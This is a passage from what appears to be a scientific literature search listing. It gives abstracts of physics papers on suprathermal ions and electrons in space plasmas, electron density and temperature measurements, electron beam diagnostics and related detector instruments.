(i.e., an average of about 4% He{sup 2+}). These distributions may evolve from suprathermal ion distributions that have energies between 1 and a few keV/e. Upstream intervals were selected from the ISEE data to determine which suprathermal distributions have He{sup 2+} concentrations similar to those of diffuse ion distributions. The type of distribution and the location in the foreshock were similar in all events studied. Two intervals that represent the results from this study are discussed in detail. The results suggest that diffuse ion distributions evolve from suprathermal distributions in the region upstream from the quasi-parallel bow shock. For He{sup 2+}, the suprathermal distribution is a nongyrotropic partial ring beam and has characteristics consistent with specular reflection off the quasi-parallel bow shock. The suprathermal proton distributions associated with these He{sup 2+} distributions are nongyrotropic partial ring beams or nearly gyrotropic ring beams also approximately consistent with specular reflection. The location in the quasi-parallel foreshock and the similarity of the suprathermal He{sup 2+} and H{sup +} distributions suggest that these are the seed population for diffuse distributions in the foreshock region. 30 refs., 5 figs., 1 tab. 15. Discovery of Suprathermal Ionospheric Origin Fe+ in and Near Earth's Magnetosphere Science.gov (United States) Christon, S. P.; Hamilton, D. C.; Plane, J. M. C.; Mitchell, D. G.; Grebowsky, J. M.; Spjeldvik, W. N.; Nylund, S. R. 2017-11-01 Suprathermal (87-212 keV/e) singly charged iron, Fe+, has been discovered in and near Earth's 9-30 RE equatorial magnetosphere using 21 years of Geotail STICS (suprathermal ion composition spectrometer) data. Its detection is enhanced during higher geomagnetic and solar activity levels. Fe+, rare compared to dominant suprathermal solar wind and ionospheric origin heavy ions, might derive from one or all three candidate lower-energy sources: (a) ionospheric outflow of Fe+ escaped from ion layers near 100 km altitude, (b) charge exchange of nominal solar wind iron, Fe+≥7, in Earth's exosphere, or (c) inner source pickup Fe+ carried by the solar wind, likely formed by solar wind Fe interaction with near-Sun interplanetary dust particles. Earth's semipermanent ionospheric Fe+ layers derive from tons of interplanetary dust particles entering Earth's atmosphere daily, and Fe+ scattered from these layers is observed up to 1000 km altitude, likely escaping in strong ionospheric outflows. Using 26% of STICS's magnetosphere-dominated data when possible Fe+2 ions are not masked by other ions, we demonstrate that solar wind Fe charge exchange secondaries are not an obvious Fe+ source. Contemporaneous Earth flyby and cruise data from charge-energy-mass spectrometer on the Cassini spacecraft, a functionally identical instrument, show that inner source pickup Fe+ is likely not important at suprathermal energies. Consequently, we suggest that ionospheric Fe+ constitutes at least a significant portion of Earth's suprathermal Fe+, comparable to the situation at Saturn where suprathermal Fe+ is also likely of ionospheric origin. 16. Electron density measurement for steady state plasmas International Nuclear Information System (INIS) Kawano, Yasunori; Chiba, Shinichi; Inoue, Akira 2000-01-01 Electron density of a large tokamak has been measured successfully by the tangential CO 2 laser polarimeter developed in JT-60U. The tangential Faraday rotation angles of two different wavelength of 9.27 and 10.6 μm provided the electron density independently. Two-color polarimeter concept for elimination of Faraday rotation at vacuum windows is verified for the first time. A system stability for long time operation up to ∼10 hours is confirmed. A fluctuation of a signal baseline is observed with a period of ∼3 hours and an amplitude of 0.4 - 0.7deg. In order to improve the polarimeter, an application of diamond window for reduction of the Faraday rotation at vacuum windows and another two-color polarimeter concept for elimination of mechanical rotation component are proposed. (author) 17. Electron thermal conduction in LASNEX International Nuclear Information System (INIS) Munro, D.; Weber, S. 1994-01-01 This report is a transcription of hand-written notes by DM dated 29 January 1986, transcribed by SW, with some clarifying comments added and details specific to running the LASNEX code deleted. Reference to the esoteric measurement units employed in LASNEX has also been deleted by SW (hopefully, without introducing errors in the numerical constants). The report describes the physics equations only, and only of electron conduction. That is, it does not describe the numerical method, which may be finite difference or finite element treatment in space, and (usually) implicit treatment in time. It does not touch on other electron transport packages which are available, and which include suprathermal electrons, nonlocal conduction, Krook model conduction, and modifications to electron conduction by magnetic fields. Nevertheless, this model is employed for the preponderance of LASNEX simulations 18. Electron density measurements on the plasma focus International Nuclear Information System (INIS) Rueckle, B. 1976-01-01 The paper presents a determination of the maximum electron density in a plasma focus, produced with the NESSI experimental setup, by the method of laser beam deflection. For each discharge a time-resolved measurement was performed at four different places. Neutron efficiency as well as the time of the initial X-ray emission was registrated. The principle and the economic aspects of the beam deflection method are presented in detail. The experimental findings and the resulting knowledge of the neutron efficiency are discussed. (GG) [de 19. Electron temperature measurement in Z-pinch International Nuclear Information System (INIS) Gerusov, A.V.; Orlov, M.M.; Terent'ev, A.R.; Khrabrov, V.A. 1987-01-01 Measurement of temperature of emitting plasma sheath in noncylindrical Z-pinch in neon at the stage of convergence to the axis, based on comparing the intensity of spectral lines belonging to Ne1, Ne2, is performed. Line intensity relation dependence was determined using calculations according to emitting-collision model. Spectra were recorded by electron-optical converter and relative intensity was determined by subsequent photometry of photolayer. Cylindric symmetrical MHD-calculations during which temperature and the observed line intensity relation were determined, are conducted 20. CINEMA (Cubesat for Ion, Neutral, Electron, MAgnetic fields) Science.gov (United States) Lin, R. P.; Parks, G. K.; Halekas, J. S.; Larson, D. E.; Eastwood, J. P.; Wang, L.; Sample, J. G.; Horbury, T. S.; Roelof, E. C.; Lee, D.; Seon, J.; Hines, J.; Vo, H.; Tindall, C.; Ho, J.; Lee, J.; Kim, K. 2009-12-01 The NSF-funded CINEMA mission will provide cutting-edge magnetospheric science and critical space weather measurements, including high sensitivity mapping and high cadence movies of ring current, >4 keV Energetic Neutral Atom (ENA), as well as in situ measurements of suprathermal electrons (>~2 keV) and ions (>~ 4 keV) in the auroral and ring current precipitation regions, all with ~1 keV FWHM resolution and uniform response up to ~100 keV. A Suprathermal Electron, Ion, Neutral (STEIN) instrument adds an electrostatic deflection system to the STEREO STE (SupraThermal Electron) 4-pixel silicon semiconductor sensor to separate ions from electrons and from ENAs up to ~20 keV. In addition, inboard and outboard (on an extendable 1m boom) magnetoresistive sensor magnetometers will provide high cadence 3-axis magnetic field measurements. A new attitude control system (ACS) uses torque coils, a solar aspect sensor and the magnetometers to de-tumble the 3u CINEMA spacecraft, then spin it up to ~1 rpm with the spin axis perpendicular to the ecliptic, so STEIN can sweep across most of the sky every minute. Ideally, CINEMA will be placed into a high inclination low earth orbit that crosses the auroral zone and cusp. An S-band transmitter will be used to provide > ~8 kbps orbit-average data downlink to the ~11m diameter antenna of the Berkeley Ground Station. Two more identical CINEMA spacecraft will be built by Kyung Hee University (KHU) in Korea under their World Class University (WCU) program, to provide stereo ENA imaging and multi-point in situ measurements. Furthermore, CINEMA’s development of miniature particle and magnetic field sensors, and cubesat-size spinning spacecraft will be important for future nanosatellite space missions. 1. Fabrication and measurement of gas electron multiplier International Nuclear Information System (INIS) Zhang Minglong; Xia Yiben; Wang Linjun; Gu Beibei; Wang Lin; Yang Ying 2005-01-01 Gas electron multiplier (GEM) with special performance has been widely used in the field of radiation detectors. In this work, GEM film was fabricated using a 50 μm -thick kapton film by the therma evaporation and laser masking drilling technique. GEM film has many uniformly arrayed holes with a diameter of 100 μm and a gap of 223 μm. It was then set up to a gas-flowing detector with an effective area of 3 x 3 cm 2 , 5.9 keV X-ray generated from a 55 Fe source was used to measure the pulse height distribution of GEM operating at various high voltage and gas proportion. The effect of high potential and gas proportion on the count rate and the energy resolution was discussed in detail. The results indicate that GEM has a very high ratio of signal to noise and better energy resolution of 18.2%. (authors) 2. Preionization electron density measurement by collecting electric charge International Nuclear Information System (INIS) Giordano, G.; Letardi, T. 1988-01-01 A method using electron collection for preionization-electron number density measurements is presented. A cathode-potential drop model is used to describe the measurement principle. There is good agreement between the model and the experimental result 3. Source Population and Acceleration Location of Suprathermal Heavy Ions in Corotating Interaction Regions Energy Technology Data Exchange (ETDEWEB) Filwett, R. J.; Desai, M. I. [University of Texas at San Antonio, San Antonio, TX (United States); Dayeh, M. A.; Broiles, T. W. [Southwest Research Institute, San Antonio, TX (United States) 2017-03-20 We have analyzed the ∼20–320 keV nucleon{sup −1} suprathermal (ST) heavy ion abundances in 41 corotating interaction regions (CIRs) observed by the Wind spacecraft from 1995 January to 2008 December. Our results are: (1) the CIR Fe/CNO and NeS/CNO ratios vary with the sunspot number, with values being closer to average solar energetic particle event values during solar maxima and lower than nominal solar wind values during solar minima. The physical mechanism responsible for the depleted abundances during solar minimum remains an open question. (2) The Fe/CNO increases with energy in the 6 events that occurred during solar maximum, while no such trends are observed for the 35 events during solar minimum. (3) The Fe/CNO shows no correlation with the average solar wind speed. (4) The Fe/CNO is well correlated with the corresponding upstream ∼20–320 keV nucleon{sup −1} Fe/CNO and not with the solar wind Fe/O measured by ACE in 31 events. Using the correlations between the upstream ∼20–40 keV nucleon{sup −1} Fe/CNO and the ∼20–320 keV nucleon{sup −1} Fe/CNO in CIRs, we estimate that, on average, the ST particles traveled ∼2 au along the nominal Parker spiral field line, which corresponds to upper limits for the radial distance of the source or acceleration location of ∼1 au beyond Earth orbit. Our results are consistent with those obtained from recent surveys, and confirm that CIR ST heavy ions are accelerated more locally, and are at odds with the traditional viewpoint that CIR ions seen at 1 au are bulk solar wind ions accelerated between 3 and 5 au. 4. Laboratory Measurements of Electrostatic Solitary Structures Generated by Beam Injection International Nuclear Information System (INIS) Lefebvre, Bertrand; Chen, Li-Jen; Gekelman, Walter; Pribyl, Patrick; Vincena, Stephen; Kintner, Paul; Pickett, Jolene; Chiang, Franklin; Judy, Jack 2010-01-01 Electrostatic solitary structures are generated by injection of a suprathermal electron beam parallel to the magnetic field in a laboratory plasma. Electric microprobes with tips smaller than the Debye length (λ De ) enabled the measurement of positive potential pulses with half-widths 4 to 25λ De and velocities 1 to 3 times the background electron thermal speed. Nonlinear wave packets of similar velocities and scales are also observed, indicating that the two descend from the same mode which is consistent with the electrostatic whistler mode and result from an instability likely to be driven by field-aligned currents. 5. A kinetic study of solar wind electrons International Nuclear Information System (INIS) Lie-Svendsen, Oeystein; Leer, Egil 1996-01-01 The evolution of the distribution function for a test population of electrons in an isothermal electron-proton corona has been studied using a Fokker-Planck description. The aim is to investigate whether a suprathermal tail forms due to the energy dependence of the Coulomb cross section. We find that a Maxwellian test population, injected into this background close to the coronal base with a temperature equal to that of the background electrons, maintains its shape throughout the transition from collision-dominated to collisionless flow. No significant suprathermal tail in the electron distribution function is seen in the outer corona 6. Electron energy measurements in pulsating auroras International Nuclear Information System (INIS) McEwan, D.J.; Yee, E.; Whalen, B.A.; Yau, A.W. 1981-01-01 Electron spectra were obtained during two rocket flights into pulsating aurora from Southend, Saskatchewan. The first rocket launched at 1143:24 UT on February 15, 1980 flew into an aurora of background intensity 275 R of N 2 + 4278 A and showing regular pulsations with about a 17 s period. Electron spectra of Maxwellian energy distributions were observed with an average E 0 = 1.5 keV, rising to 1.8 keV during the pulsations. There was one-to-one correspondence between the electron energy modulation and the observed optical pulsations. The second rocket, launched at 1009:10 UT on February 23, flew into a diffuse auroral surface of intensity 800 R of N 2 + 4278 A and with somewhat irregular pulsations. The electron spectra were again of Maxwellian energy distribution with an average E 0 = 1.8 keV increasing to 2.1 keV during the pulsations. The results from these flights suggest that pulsating auroras occurring in the morning sector may be quite commonly excited by low energy electrons. The optical pulsations are due to periodic increases in the energy of the electrons with the source of modulation in the vicintiy of the geomagnetic equatorial plane. (auth) 7. Electron bunch length measurement with a wakefield radiation decelerator Directory of Open Access Journals (Sweden) Weiwei Li 2014-03-01 Full Text Available In this paper, we propose a novel method to measure the electron bunch length with a dielectric wakefield radiation (DWR decelerator which is composed of two dielectric-lined waveguides (DLWs and an electron spectrometer. When an electron beam passes through a DLW, the DWR is excited which leads to an energy loss of the electron beam. The energy loss is found to be largely dependent on the electron bunch length and can be easily measured by an electron spectrometer which is essential for a normal accelerator facility. Our study shows that this method has a high resolution and a great simplicity. 8. Measurements of beat wave accelerated electrons in a toroidal plasma International Nuclear Information System (INIS) Rogers, J.H. 1992-06-01 Electrons are accelerated by large amplitude electron plasma waves driven by counter-propagating microwaves with a difference frequency approximately equal to the electron plasma frequency. Energetic electrons are observed only when the phase velocity of the wave is in the range 3v e ph e (v ph was varied 2v e ph e ), where v e is the electron thermal velocity, (kT e /m e ) 1/2 . As the phase velocity increases, fewer electrons are accelerated to higher velocities. The measured current contained in these accelerated electrons has the power dependence predicted by theory, but the magnitude is lower than predicted 9. Measurement of electron beam polarization at the SLC International Nuclear Information System (INIS) Steiner, H. 1987-03-01 The polarimeters needed to monitor and measure electron beam polarization at the Stanford Linear Collider are discussed. Two types of polarimeters, are to be used. The first is based on the spin dependent elastic scattering of photons from high energy electrons. The second utilizes the spin dependence of elastic electron-electron scattering. The plans of the SLC polarization group to measure and monitor electron beam polarization are discussed. A brief discussion of the physics and the demands it imposes on beam polarization measurements is presented. The Compton polarimeter and the essential characteristics of two Moeller polarimeters are presented 10. Electron-cloud measurements and simulations for the APS International Nuclear Information System (INIS) Furman, M.A.; Pivi, M.; Harkay, K.C.; Rosenberg, R.A. 2001-01-01 We compare experimental results with simulations of the electron cloud effect induced by a positron beam at the APS synchrotron light source at ANL, where the electron cloud effect has been observed and measured with dedicated probes. We find good agreement between simulations and measurements for reasonable values of certain secondary electron yield (SEY) parameters, most of which were extracted from recent bench measurements at SLAC 11. Solar wind ∼0.1-1.5 keV electrons at quiet times Energy Technology Data Exchange (ETDEWEB) Tao, Jiawei; Wang, Linghua, E-mail: [email protected]; Zong, Qiugang; He, Jiansen; Tu, Chuanyi [School of Earth and Space Science, Peking University, Beijing 100871 (China); Li, Gang [Department of Physics and CSPAR, University of Alabama in Huntsville, Alabama 35899 (United States); Salem, Chadi S.; Bale, Stuart D. [Space Sciences Laboratory, University of California, Berkeley, CA 94720 (United States); Wimmer-Schweingruber, Robert F. [Institute for Experimental and Applied Physics, University of Kiel (Germany) 2016-03-25 We present a statistical survey of the energy spectrum of solar wind suprathermal (∼0.1-1.5 keV) electrons measured by the WIND 3-D Plasma & Energetic Particle (3DP) instrument at 1 AU during quiet times at the minimum and maximum of solar cycles 23 and 24. Firstly, we separate strahl (beaming) electrons and halo (isotropic) electrons based on their features in pitch angle distributions. Secondly, we fit the observed energy spectrum of both the strahl and halo electrons at ∼0.1-1.5 keV to a Kappa distribution function with an index κ, effective temperature T{sub eff} and density n{sub 0}. We also integrate the the measurements over ∼0.1-1.5 keV to obtain the average electron energy E{sub avg} of the strahl and halo. We find a strong positive correlation between κ and T{sub eff} for both the strahl and halo, possibly reflecting the nature of the generation of these suprathermal electrons. Among the 245 selected samples, ∼68% have the halo κ smaller than the strahl κ, while ∼50% have the halo E{sub h} larger than the strahl E{sub s}. 12. Benchmarking NaI(Tl) Electron Energy Resolution Measurements International Nuclear Information System (INIS) Mengesha, Wondwosen; Valentine, J D. 2002-01-01 A technique for validating electron energy resolution results measured using the modified Compton coincidence technique (MCCT) has been developed. This technique relies on comparing measured gamma-ray energy resolution with calculated values that were determined using the measured electron energy resolution results. These gamma-ray energy resolution calculations were based on Monte Carlo photon transport simulations, the measured NaI(Tl) electron response, a simplified cascade sequence, and the measured electron energy resolution results. To demonstrate this technique, MCCT-measured NaI(Tl) electron energy resolution results were used along with measured gamma-ray energy resolution results from the same NaI(Tl) crystal. Agreement to within 5% was observed for all energies considered between the calculated and measured gamma-ray energy resolution results for the NaI(Tl) crystal characterized. The calculated gamma-ray energy resolution results were also compared with previously published gamma-ray energy resolution measurements with good agreement (<10%). In addition to describing the validation technique that was developed in this study and the results, a brief review of the electron energy resolution measurements made using the MCCT is provided. Based on the results of this study, it is believed that the MCCT-measured electron energy resolution results are reliable. Thus, the MCCT and this validation technique can be used in the future to characterize the electron energy resolution of other scintillators and to determine NaI(Tl) intrinsic energy resolution 13. Measurement of electron beams profile of pierce type electron source using sensor of used Tv tube International Nuclear Information System (INIS) Darsono; Suhartono; Suprapto; Elin Nuraini 2015-01-01 The measurement of an electron beam profile has been performed using electron beam monitor based on method of phosphorescent materials. The main components of the electron beam monitor consists of a fluorescent sensor using a used Tv tube, CCTV camera to record images on a Tv screen, video adapter as interface between CCTV and laptop, and the laptop as a viewer and data processing. Two Pierce-type electron sources diode and triode was measured the shape of electron beam profile in real time. Results of the experiments showed that the triode electron source of Pierce type gave the shape of electron beam profiles better than that of the diode electron source .The anode voltage is not so influential on the beam profile shape. The focused voltage in the triode electron source is so influence to the shape of the electron beam profile, but above 5 kV no great effect. It can be concluded that the electron beam monitor can provide real time observations and drawings shape of the electron beam profile displayed on the used Tv tube glass screen which is the real picture of the shape of the electron beam profile. Triode electron source produces a better electron beam profile than that of the diode electron source. (author) 14. Electronic system for Langmuir probe measurements Czech Academy of Sciences Publication Activity Database Mitov, M.; Bankova, A.; Dimitrova, M.; Ivanova, P.; Tutulkov, K.; Djermanova, N.; Dejarnac, Renaud; Stöckel, Jan; Popov, Tsv.K. 2012-01-01 Roč. 356, č. 1 (2012), s. 012008 ISSN 1742-6588. [InternationalSummerSchoolonVacuum,Electron, and IonTechnologies(VEIT2011)/17./. Sunny Beach, 19.09.2011-23.09.2011] Institutional research plan: CEZ:AV0Z20430508 Keywords : Plasma * tokamak * diagnostics * electric probe Subject RIV: BL - Plasma and Gas Discharge Physics http://iopscience.iop.org/1742-6596/356/1/012008/pdf/1742-6596_356_1_012008.pdf 15. Development of electron temperature measuring system by silicon drift detector International Nuclear Information System (INIS) Song Xianying; Yang Jinwei; Liao Min 2007-12-01 Soft X-ray spectroscopy with two channels Silicon Drift Detector (SDD) are adopted for electron temperature measuring on HL-2A tokamak in 2005. The working principle, design and first operation of the SDD soft X-ray spectroscopy are introduced. The measuring results of electron temperature are also presented. The results show that the SDD is very good detector for electron temperature measuring on HL-2A tokamak. These will become a solid basic work to establish SDD array for electron temperature profiling. (authors) 16. Measurement of the tau lepton electronic branching fraction International Nuclear Information System (INIS) Akerib, D.S.; Barish, B.; Chadha, M.; Cowen, D.F.; Eigen, G.; Miller, J.S.; Urheim, J.; Weinstein, A.J.; Acosta, D.; Masek, G.; Ong, B.; Paar, H.; Sivertz, M.; Bean, A.; Gronberg, J.; Kutschke, R.; Menary, S.; Morrison, R.J.; Nelson, H.N.; Richman, J.D.; Tajima, H.; Schmidt, D.; Sperka, D.; Witherell, M.S.; Procario, M.; Yang, S.; Daoudi, M.; Ford, W.T.; Johnson, D.R.; Lingel, K.; Lohner, M.; Rankin, P.; Smith, J.G.; Alexander, J.P.; Bebek, C.; Berkelman, K.; Besson, D.; Browder, T.E.; Cassel, D.G.; Coffman, D.M.; Drell, P.S.; Ehrlich, R.; Galik, R.S.; Garcia-Sciveres, M.; Geiser, B.; Gittelman, B.; Gray, S.W.; Hartill, D.L.; Heltsley, B.K.; Honscheid, K.; Jones, C.; Kandaswamy, J.; Katayama, N.; Kim, P.C.; Kreinick, D.L.; Ludwig, G.S.; Masui, J.; Mevissen, J.; Mistry, N.B.; Ng, C.R.; Nordberg, E.; O'Grady, C.; Patterson, J.R.; Peterson, D.; Riley, D.; Sapper, M.; Selen, M.; Worden, H.; Worris, M.; Wuerthwein, F.; Avery, P.; Freyberger, A.; Rodriguez, J.; Stephens, R.; Yelton, J.; Cinabro, D.; Henderson, S.; Kinoshita, K.; Liu, T.; Saulnier, M.; Wilson, R.; Yamamoto, H.; Sadoff, A.J.; Ammar, R.; Ball, S.; Baringer, P.; Coppage, D.; Copty, N.; Davis, R.; Hancock, N.; Kelly, M.; Kwak, N.; Lam, H.; Kubota, Y.; Lattery, M.; Nelson, J.K.; Patton, S.; Perticone, D.; Poling, R.; Savinov, V.; Schrenk, S.; Wang, R.; Alam, M.S.; Kim, I.J.; Nemati, B.; O'Neill, J.J.; Romero, V.; Severini, H.; Sun, C.R.; Wang, P.; Zoeller, M.M.; Crawford, G.; Fulton, R.; Gan, K.K.; Kagan, H.; Kass, R.; Lee, J.; Malchow, R.; Morrow, F.; Sung, M.; White, C.; Whitmore, J.; Wilson, P.; Butler, F.; Fu, X.; Kalbfleisch, G.; Lambrecht, M.; Ross, W.R.; Skubic, P.; Snow, J.; Wang, P.; Bortoletto, D.; Brown, D.N.; Dominick, J.; McIlwain, R.L.; Miao, T.; Miller, D.H.; Modesitt, M.; Schaffner, S.F.; Shibata, E.I.; Shipsey, I.P.J.; Battle, M.; Ernst, J.; Kroha, H.; Roberts, S.; Sparks, K.; Thorndike, E.H.; Wang, C.; Sanghera, S.; Skwarnicki, T.; Stroynowski, R.; Artuso, M.; Goldberg, M.; Horwitz, N. 1992-01-01 The tau lepton electron branching fraction has been measured with the CLEO II detector at the Cornell Electron Storage Ring as B e =0.1749±0.0014±0.0022, with the first error statistical and the second systematic. The measurement involves counting electron-positron annihilation events in which both taus decay to electrons, and normalizing to the number of tau-pair decays expected from the measured luminosity. Detected photons in these events constitute a definitive observation of tau decay radiation 17. Calibration Base Lines for Electronic Distance Measuring Instruments (EDMI) Data.gov (United States) National Oceanic and Atmospheric Administration, Department of Commerce — A calibration base line (CBL) is a precisely measured, straight-line course of approximately 1,400 m used to calibrate Electronic Distance Measuring Instruments... 18. Local charge measurement using off-axis electron holography DEFF Research Database (Denmark) Beleggia, Marco; Gontard, L.C.; Dunin-Borkowski, R.0E. 2016-01-01 A model-independent approach based on Gauss’ theorem for measuring the local charge in a specimen from an electron-optical phase image recorded using off-axis electron holography was recently proposed. Here, we show that such a charge measurement is reliable when it is applied to determine the to... 19. Atomic physics measurements in an electron Beam Ion Trap International Nuclear Information System (INIS) Marrs, R.E.; Beiersdorfer, P.; Bennett, C. 1989-01-01 An electron Beam Ion Trap at Lawrence Livermore National Laboratory is being used to produce and trap very-highly-charged ions (q ≤ 70/+/) for x-ray spectroscopy measurements. Recent measurements of transition energies and electron excitation cross sections for x-ray line emission are summarized. 13 refs., 10 figs 20. Spectral and electronic measurements of solar radiation International Nuclear Information System (INIS) Suzuki, Mamoru; Hanyu, Mitsuhiro 1977-01-01 The spectral data of solar radiation are necessary if detailed discussion is intended in relation to the utilization of solar energy. Since those data have not been fully prepared so far, a measuring equipment developed in Electro-technical Laboratory to obtain those data is described. The laboratory is now continuing the measurement at the wavelength of 0.3 μm to 1.1 μm. The equipment employs the system to always calibrate with the standard light source, it can measure both the direct light of the sun only and the sun light including sky light, and it enables to obtain the value based on the secondary standard of spectral illumination intensity established by the laboratory. The solar spectral irradiance is determined with the current readings of photomultiplier in the standard light source and the sun-light measurements at a wavelength and with the spectral illumination intensity from the standard light source. In order to practice such measurement many times at various wavelengths, control of the equipment, data collection, computation, drawing and listing are performed by a microcomputer. As an example, the data on Sept. 10, 1976, are shown comparing the graphs at three different hours. It can be well observed that the transmissivity attenuates with shorter wavelength, and the transmissivity in near infra-red region changes greatly due to the absorption of radiation by water vapour. (Wakatsuki, Y.) 1. Focus measurement of electron linear accelerator International Nuclear Information System (INIS) Su Zhijun; Xin Jian; Jia Qinglong 2007-01-01 Many personal factors would influence the result of the focus measurement of linear accelerator using the conventional sandwich method. This paper presents a modified method which applies a film scanning meter to scan the X-ray image film got by sandwich method for obtaining a greyscale distribution, then the full width at half maximum value of greyscale distribution represents the focus size. The method can eliminates disadvantage influence from accelerator radiant field asymmetry by quadratic polynomial fitting and measures peak width at half height instead of stripe statistic. (authors) 2. Introduction to electronic relaxation in solids: mechanisms and measuring techniques International Nuclear Information System (INIS) Bonville, P. 1983-01-01 The fluctuations of electronic magnetic moments in solids may be investigated by several techniques, either electronic or nuclear. This paper is an introduction of the most frequently encountered paramagnetic relaxation mechanisms (phonons, conduction electrons, exchange or dipolar interactions) in condensed matter, and to the different techniques used for measuring relaxation frequencies: electronic paramagnetic resonance, nuclear magnetic resonance, Moessbauer spectroscopy, inelastic neutron scattering, measurement of longitudinal ac susceptibility and γ-γ perturbed angular correlations. We mainly focus our attention on individual ionic fluctuation spectra, the majority of the experimental work refered to concerning rare earth systems [fr 3. Electron Cloud Measurements in Fermilab Main Injector and Recycler Energy Technology Data Exchange (ETDEWEB) Eldred, Jeffrey Scott [Indiana U.; Backfish, M. [Fermilab; Tan, C. Y. [Fermilab; Zwaska, R. [Fermilab 2015-06-01 This conference paper presents a series of electron cloud measurements in the Fermilab Main Injector and Recycler. A new instability was observed in the Recycler in July 2014 that generates a fast transverse excitation in the first high intensity batch to be injected. Microwave measurements of electron cloud in the Recycler show a corresponding depen- dence on the batch injection pattern. These electron cloud measurements are compared to those made with a retard- ing field analyzer (RFA) installed in a field-free region of the Recycler in November. RFAs are also used in the Main Injector to evaluate the performance of beampipe coatings for the mitigation of electron cloud. Contamination from an unexpected vacuum leak revealed a potential vulnerability in the amorphous carbon beampipe coating. The diamond-like carbon coating, in contrast, reduced the electron cloud signal to 1% of that measured in uncoated stainless steel beampipe. 4. Electron drift velocity measurements in liquid krypton-methane mixtures CERN Document Server Folegani, M; Magri, M; Piemontese, L 1999-01-01 Electron drift velocities have been measured in liquid krypton, pure and mixed with methane at different concentrations (1-10% in volume) versus electric field strength, and a possible effect of methane on electron lifetime has been investigated. While no effect on lifetime could be detected, since lifetimes were in all cases longer than what measurable, a very large increase in drift velocity (up to a factor 6) has been measured. 5. Measuring the electron beam energy in a magnetic bunch compressor International Nuclear Information System (INIS) Hacker, Kirsten 2010-09-01 Within this thesis, work was carried out in and around the first bunch compressor chicane of the FLASH (Free-electron LASer in Hamburg) linear accelerator in which two distinct systems were developed for the measurement of an electron beams' position with sub-5 μm precision over a 10 cm range. One of these two systems utilized RF techniques to measure the difference between the arrival-times of two broadband electrical pulses generated by the passage of the electron beam adjacent to a pickup antenna. The other system measured the arrival-times of the pulses from the pickup with an optical technique dependent on the delivery of laser pulses which are synchronized to the RF reference of the machine. The relative advantages and disadvantages of these two techniques are explored and compared to other available approaches to measure the same beam property, including a time-of-flight measurement with two beam arrival-time monitors and a synchrotron light monitor with two photomultiplier tubes. The electron beam position measurement is required as part of a measurement of the electron beam energy and could be used in an intra-bunch-train beam-based feedback system that would stabilize the amplitude of the accelerating field. By stabilizing the accelerating field amplitude, the arrival-time of the electron beam can be made more stable. By stabilizing the electron beam arrival-time relative to a stable reference, diagnostic, seeding, and beam-manipulation lasers can be synchronized to the beam. (orig.) 6. Emittance measurements of the CLIO electron beam Science.gov (United States) Chaput, R.; Devanz, G.; Joly, P.; Kergosien, B.; Lesrel, J. 1997-02-01 We have designed a setup to measure the transverse emittance at the CLIO accelerator exit, based on the "3 gradients" method. The beam transverse size is measured simply by scanning it with a steering coil across a fixed jaw and recording the transmitted current, at various quadrupole strengths. A code then performs a complete calculation of the emittance using the transfer matrix of the quadrupole instead of the usual classical lens approximation. We have studied the influence of various parameters on the emittance: Magnetic field on the e-gun and the peak current. We have also improved a little the emittance by replacing a mismatched pipe between the buncher and accelerating section to avoid wake-field effects; The resulting improvements of the emittance have led to an increase in the FEL emitted power. 7. Interferometer for electron density measurement in exploding wire plasma International Nuclear Information System (INIS) Batra, Jigyasa; Jaiswar, Ashutosh; Kaushik, T.C. 2016-12-01 Mach-Zehnder Interferometer (MZI) has been developed for measuring electron density profile in pulsed plasmas. MZI is to be used for characterizing exploding wire plasmas for correlating electron density dynamics with x-rays emission. Experiments have been carried out for probing electron density in pulsed plasmas produced in our laboratory like in spark gap and exploding wire plasmas. These are microsecond phenomenon. Changes in electron density have been registered in interferograms with the help of a streak camera for specific time window. Temporal electron density profiles have been calculated by analyzing temporal fringe shifts in interferograms. This report deals with details of MZI developed in our laboratory along with its theory. Basic introductory details have also been provided for exploding wire plasmas to be probed. Some demonstrative results of electron density measurements in pulsed plasmas of spark gap and single exploding wires have been described. (author) 8. Measurements of electron attachment by oxygen molecule in proportional counter Energy Technology Data Exchange (ETDEWEB) Tosaki, M., E-mail: [email protected] [Radioisotope Research Center, Kyoto University, Kyoto 606-8501 (Japan); Kawano, T. [National Institute for Fusion Science, 322-6 Oroshi, Toki 509-5292 (Japan); Isozumi, Y. [Radioisotope Research Center, Kyoto University, Kyoto 606-8501 (Japan) 2013-11-15 We present pulse height measurements for 5-keV Auger electrons from a radioactive {sup 55}Fe source mounted at the inner cathode surface of cylindrical proportional counter, which is operated with CH{sub 4} admixed dry air or N{sub 2}. A clear shift of the pulse height has been observed by varying the amount of the admixtures; the number of electrons, created in the primary ionization by Auger electrons, is decreased by the electron attachment of the admixtures during their drift from the place near the source to the anode wire. The large gas amplification (typically 10{sup 4}) in the secondary ionization of proportional counter makes it possible to investigate a small change in the number of primary electrons. The electron attenuation cross-section of O{sub 2} has been evaluated by analyzing the shifts of the pulse height caused by the electron attachment to dry air and N{sub 2}. 9. Three-wave electron vortex lattices for measuring nanofields. Science.gov (United States) Dwyer, C; Boothroyd, C B; Chang, S L Y; Dunin-Borkowski, R E 2015-01-01 It is demonstrated how an electron-optical arrangement consisting of two electron biprisms can be used to generate three-wave vortex lattices with effective lattice spacings between 0.1 and 1 nm. The presence of vortices in these lattices was verified by using a third biprism to perform direct phase measurements via off-axis electron holography. The use of three-wave lattices for nanoscale electromagnetic field measurements via vortex interferometry is discussed, including the accuracy of vortex position measurements and the interpretation of three-wave vortex lattices in the presence of partial spatial coherence. Copyright © 2014 Elsevier B.V. All rights reserved. 10. Resistance and sheet resistance measurements using electron beam induced current International Nuclear Information System (INIS) Czerwinski, A.; Pluska, M.; Ratajczak, J.; Szerling, A.; KaPtcki, J. 2006-01-01 A method for measurement of spatially uniform or nonuniform resistance in layers and strips, based on electron beam induced current (EBIC) technique, is described. High electron beam currents are used so that the overall resistance of the measurement circuit affects the EBIC signal. During the evaluation, the electron beam is scanned along the measured object, whose load resistance varies with the distance. The variation is compensated by an adjustable resistance within an external circuit. The method has been experimentally deployed for sheet resistance determination of buried regions of lateral confinements in semiconductor laser heterostructures manufactured by molecular beam epitaxy 11. Calculation of Self-consistent Radial Electric Field in Presence of Convective Electron Transport in a Stellarator International Nuclear Information System (INIS) Kernbichler, W.; Heyn, M.F.; Kasilov, S.V. 2003-01-01 Convective transport of supra-thermal electrons can play a significant role in the energy balance of stellarators in case of high power electron cyclotron heating. Here, together with neoclassical thermal particle fluxes also the supra-thermal electron flux should be taken into account in the flux ambipolarity condition, which defines the self-consistent radial electric field. Since neoclassical particle fluxes are non-linear functions of the radial electric field, one needs an iterative procedure to solve the ambipolarity condition, where the supra-thermal 